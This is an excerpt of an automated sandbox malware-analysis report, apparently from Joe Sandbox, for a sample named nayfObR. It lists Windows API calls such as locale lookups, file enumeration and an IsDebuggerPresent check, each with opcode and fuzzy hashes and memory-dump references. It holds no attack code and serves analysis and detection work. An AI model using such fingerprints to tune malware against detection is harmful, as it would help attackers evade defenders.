                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 2933794660-0
                                                                                            • Opcode ID: 5c7a6226f3c2829beb82ec946c66b75dd9cbd8f61564378e6bca46bf5522e352
                                                                                            • Instruction ID: 421feba742ec3e10c016db67268d4a443f4449d3f6b26fcd6aaedc5025b97baa
                                                                                            • Opcode Fuzzy Hash: 5c7a6226f3c2829beb82ec946c66b75dd9cbd8f61564378e6bca46bf5522e352
                                                                                            • Instruction Fuzzy Hash: 61F06274D1160DEFCF40DBB4DA4999EBBF4EF2C200B918596A412E7110E734AB489B51
                                                                                            APIs
                                                                                              • Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
                                                                                              • Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BA684
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BA6CE
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BA794
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 661929714-0
                                                                                            • Opcode ID: 37028b40e4462c3cc4cb9bf12f82ecffde33051323db8a813a86ca099eae28f6
                                                                                            • Instruction ID: ac572372e18d4e66f1d165d0ed52eb7575072e5cd02d66b460a58cdef536604f
                                                                                            • Opcode Fuzzy Hash: 37028b40e4462c3cc4cb9bf12f82ecffde33051323db8a813a86ca099eae28f6
                                                                                            • Instruction Fuzzy Hash: 62619C719046079FEB299F28CD86BFA7BB8FF44310F1040AAE905C6585EB34E981DB52
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 005B1728
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 005B1732
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 005B173F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 7d28b3782061d69d9a3f945d3ab5e513c1109b95a2cf378964c9bcaab62e4ee0
                                                                                            • Instruction ID: b002d218cdddb8f4ed9383ed29552b4418d9260c620b4eb2e71b474c7d95d73f
                                                                                            • Opcode Fuzzy Hash: 7d28b3782061d69d9a3f945d3ab5e513c1109b95a2cf378964c9bcaab62e4ee0
                                                                                            • Instruction Fuzzy Hash: DE31B27490122D9BCB61DF68D889BCDBBB8FF58310F5041EAE40CA7251EB709B858F44
                                                                                            APIs
                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005BE2E9,?,?,00000008,?,?,005C504B,00000000), ref: 005BE5BB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionRaise
                                                                                            • String ID:
                                                                                            • API String ID: 3997070919-0
                                                                                            • Opcode ID: 0218aca8bcd88fb11047a1c036d4d8b7032e3bfaebd0fcb7051211dbbd85bcbd
                                                                                            • Instruction ID: d4cc7ff5c87a3248b70e5cc9cdf6420305dbe398bc5b0798aaecb7b8ee28d91f
                                                                                            • Opcode Fuzzy Hash: 0218aca8bcd88fb11047a1c036d4d8b7032e3bfaebd0fcb7051211dbbd85bcbd
                                                                                            • Instruction Fuzzy Hash: 55B11B316106099FDB19CF28C48ABE97FE0FF45364F298658E899CF2A1C735E991CB40
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005A92C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FeaturePresentProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 2325560087-0
                                                                                            • Opcode ID: ba9503f0be960ad21199b2a1427fc8ae866069807002ae84601013aa500c2a0f
                                                                                            • Instruction ID: 9ad46c93089268e691024eae6065d3d5653be89640278d8ec3408127d45d1b24
                                                                                            • Opcode Fuzzy Hash: ba9503f0be960ad21199b2a1427fc8ae866069807002ae84601013aa500c2a0f
                                                                                            • Instruction Fuzzy Hash: 38A168B1D026198FDB29CF54D8826AEBBF0FF58314F24952BD415EB2A0C3749944EFA1
                                                                                            APIs
                                                                                              • Part of subcall function 005B62F4: RtlAllocateHeap.NTDLL(00000008,?,?,?,005B548F,00000001,00000364,00000002,000000FF,00000000,?,?,005AD225,00000000,?), ref: 005B6335
                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005BB189
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 005BB27D
                                                                                            • FindClose.KERNEL32(00000000), ref: 005BB2BC
                                                                                            • FindClose.KERNEL32(00000000), ref: 005BB2EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFile$AllocateFirstHeapNext
                                                                                            • String ID:
                                                                                            • API String ID: 4087847297-0
                                                                                            • Opcode ID: 56db28292a60bcc0db3861d63e125941d24e50098e407f94e21db38d5270d3eb
                                                                                            • Instruction ID: a0b1cd71ffbca98766e7df19103c7500933c4e824810ca5c4142155ee7bbeba8
                                                                                            • Opcode Fuzzy Hash: 56db28292a60bcc0db3861d63e125941d24e50098e407f94e21db38d5270d3eb
                                                                                            • Instruction Fuzzy Hash: BB51687590010DAFEF24AF289C99AFFBFA9FF85304F144199F41897241EBB0AD419B60
                                                                                            APIs
                                                                                              • Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
                                                                                              • Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BA944
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 3736152602-0
                                                                                            • Opcode ID: 9e108bf9db9559682a101e4e6d59c8ed9f6a1a88b850e6a3bd80bd734909be15
                                                                                            • Instruction ID: eeaf9204941d0608eb73205a6383b759944eac7d167b1c6735541857655b8303
                                                                                            • Opcode Fuzzy Hash: 9e108bf9db9559682a101e4e6d59c8ed9f6a1a88b850e6a3bd80bd734909be15
                                                                                            • Instruction Fuzzy Hash: AF219F32611207ABDF299B29DC46BFA7BA8FF84310F11407AF906D6145EB34FD04AB52
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0
                                                                                            • API String ID: 0-4108050209
                                                                                            • Opcode ID: 70ead00358a006a796398846ab6da5ab8affbb6ddd92ccf278456ca45d0f5e87
                                                                                            • Instruction ID: 16913ecb7da3bbf4f30fd07515eca9902f2c102288fbb1cdc206d52b33c044e5
                                                                                            • Opcode Fuzzy Hash: 70ead00358a006a796398846ab6da5ab8affbb6ddd92ccf278456ca45d0f5e87
                                                                                            • Instruction Fuzzy Hash: 37B1CF7090860A8BCB24FE68C5696BEBFB1BF47310F144A1DD49397E91DA74AE01CB70
                                                                                            APIs
                                                                                              • Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
                                                                                              • Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BAA64
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 3736152602-0
                                                                                            • Opcode ID: b032498c4f48ce681b2423ea32b41827d7139e4222597b2c720dc20a6d5affd8
                                                                                            • Instruction ID: c2133ec80cb28089305a802fd0b30cde1986659b6977bc7f24f2838c592a3bc0
                                                                                            • Opcode Fuzzy Hash: b032498c4f48ce681b2423ea32b41827d7139e4222597b2c720dc20a6d5affd8
                                                                                            • Instruction Fuzzy Hash: 0A11A072611607ABDB29AF28DD46AFA7BE8FF48320B10406AF501D7141EB38FD04DB61
                                                                                            APIs
                                                                                              • Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
                                                                                              • Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0
                                                                                            • EnumSystemLocalesW.KERNEL32(005BA630,00000001,00000000,?,-00000050,?,005BA413,00000000,-00000002,00000000,?,00000055,?), ref: 005BA5FA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                            • String ID:
                                                                                            • API String ID: 2417226690-0
                                                                                            • Opcode ID: dd3cb0c38836ae431e22392331372d7fc1817867427fd46a520d8c3a1ad5d433
                                                                                            • Instruction ID: 8d9eb328144c13e3521b62d3e6d7dd0d2fea1531e9bb26d2d82af5140136a117
                                                                                            • Opcode Fuzzy Hash: dd3cb0c38836ae431e22392331372d7fc1817867427fd46a520d8c3a1ad5d433
                                                                                            • Instruction Fuzzy Hash: C711E53A6007055FDF289F39C8A16BABF92FF84358B19842DE94687A40E771B943C740
                                                                                            APIs
                                                                                              • Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
                                                                                              • Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0
                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,005BA99A,00000000,00000000,?), ref: 005BABE9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 3736152602-0
                                                                                            • Opcode ID: 2455221899cd936053ddca4176732d5f19a5adf021c01c467089987a6500b43f
                                                                                            • Instruction ID: adaf12c8c8110b3d77624c12c2e03891c59d9781391dfbbaac83272f9e7ee258
                                                                                            • Opcode Fuzzy Hash: 2455221899cd936053ddca4176732d5f19a5adf021c01c467089987a6500b43f
                                                                                            • Instruction Fuzzy Hash: FA01F936A10212ABDB285A248C46BFA7F68FB40754F154828FC06A3180FB34FE41CA91
                                                                                            APIs
                                                                                              • Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
                                                                                              • Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0
                                                                                            • EnumSystemLocalesW.KERNEL32(005BA8F0,00000001,?,?,-00000050,?,005BA3DB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 005BA8CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                            • String ID:
                                                                                            • API String ID: 2417226690-0
                                                                                            • Opcode ID: 12cc5b5be249366217e2abb0bdda2a7a0f0375e5f1b69f41a697117f7ef9f834
                                                                                            • Instruction ID: e33451b79d95708130b36f7b7901f1989ffead7648bf6386e243cd6cfc491877
                                                                                            • Opcode Fuzzy Hash: 12cc5b5be249366217e2abb0bdda2a7a0f0375e5f1b69f41a697117f7ef9f834
                                                                                            • Instruction Fuzzy Hash: 93F0F6363007056FDB255F79D885ABABF95FF80368B05842DF9464BA80D671BC43D750
                                                                                            APIs
                                                                                              • Part of subcall function 005B18E1: EnterCriticalSection.KERNEL32(?,?,005B56D8,?,005CFCF8,00000008,005B55CA,00000000,00000000,?), ref: 005B18F0
                                                                                            • EnumSystemLocalesW.KERNEL32(005B61F0,00000001,005CFD78,0000000C,005B5BF1,-00000050), ref: 005B6235
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1272433827-0
                                                                                            • Opcode ID: ad04c2600839e47ecd9c9b0362717928179111fe783d04507b9f8788f057a46a
                                                                                            • Instruction ID: 63edb0dc7fe309661044138c37c31bf57725543afd93d395cf4cdaec209376db
                                                                                            • Opcode Fuzzy Hash: ad04c2600839e47ecd9c9b0362717928179111fe783d04507b9f8788f057a46a
                                                                                            • Instruction Fuzzy Hash: 36F03736A41605EFD710DF98E846BAC7BB0FB45721F10812BF410DB2A1C7755904AF94
                                                                                            APIs
                                                                                              • Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
                                                                                              • Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0
                                                                                            • EnumSystemLocalesW.KERNEL32(005BAA10,00000001,?,?,?,005BA435,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 005BA9FC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                            • String ID:
                                                                                            • API String ID: 2417226690-0
                                                                                            • Opcode ID: 3c165192e3d9b8e5e622c4022ad5d10b1e91cdeadd842866aec0aabfc0ebbfe0
                                                                                            • Instruction ID: 046a8fb466b7e0cb5d13ae4b8a8d72fa3bcc03fe41ec1c3fa378d1ee91656866
                                                                                            • Opcode Fuzzy Hash: 3c165192e3d9b8e5e622c4022ad5d10b1e91cdeadd842866aec0aabfc0ebbfe0
                                                                                            • Instruction Fuzzy Hash: EDF02B3A30024567CB149F36D856BBABF94FFC1750B07405AFE058B250C671A843D7A0
                                                                                            APIs
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,005B0633,?,20001004,00000000,00000002,?,?,005AF541), ref: 005B5D29
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: b6b76f7def79870dc859d921e0b2117c47c1b7bb0e0b1d248a03d25b1d5f282a
                                                                                            • Instruction ID: ce720d63b8d677271e772910c4c209cf8ab9f4e8f62f23c7f1ac584b42eebbbb
                                                                                            • Opcode Fuzzy Hash: b6b76f7def79870dc859d921e0b2117c47c1b7bb0e0b1d248a03d25b1d5f282a
                                                                                            • Instruction Fuzzy Hash: F4E04F31500A5EBFCF162F61DC09FEE3F1AFF94760F144520FC0665121DB329A20AA91
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00009760), ref: 005A963C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: b866200dd709933610ea842baed8ac54087039de3713b7e76bc07c46200ba443
                                                                                            • Instruction ID: e2d3a056b571c7a62ae93b94e41db08ba08963e1ba6b3e78e81c332a75ac3571
                                                                                            • Opcode Fuzzy Hash: b866200dd709933610ea842baed8ac54087039de3713b7e76bc07c46200ba443
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
